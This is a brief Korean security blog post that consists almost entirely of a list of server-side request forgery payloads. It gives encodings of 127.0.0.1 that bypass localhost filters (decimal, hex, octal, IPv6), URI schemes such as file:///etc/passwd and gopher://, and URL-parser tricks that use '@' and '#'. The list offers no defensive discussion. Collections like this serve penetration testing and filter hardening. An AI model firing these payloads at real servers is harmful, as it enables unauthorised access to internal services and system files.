-
SSRF Payload#1 - Security/Web 2020. 7. 13. 15:15
Server-Side Request Forgery
127.0.0.1 BYPASS
- http://localhost
- http://[::]/
- http://[::]:8080
- http://0000::1/
- http://0:8080
- http://:8080
- http://[0:0:0:0:0:ffff:127.0.0.1]
- http://0177.0.0.1
- http://2130706433 (Demical)
- http://7f.00.00.01 (Hex)
- http://0x7f000001 (Hex)
- http://127.0.1
- http://127.1
URI Schemae
- File:///etc/passwd
- File://\/\/etc/passwd
- FTP://
- TELNET://
- Gopher://
URL Parser
- http://127.0.0.1@google.com/
Google
www.google.com
- http://127.0.0.1#@google.com/
'#1 - Security > Web' 카테고리의 다른 글
JavaScript Prototype과 Prototype Pollution (0) 2022.12.28 Python Requests Authorization Header (0) 2022.12.02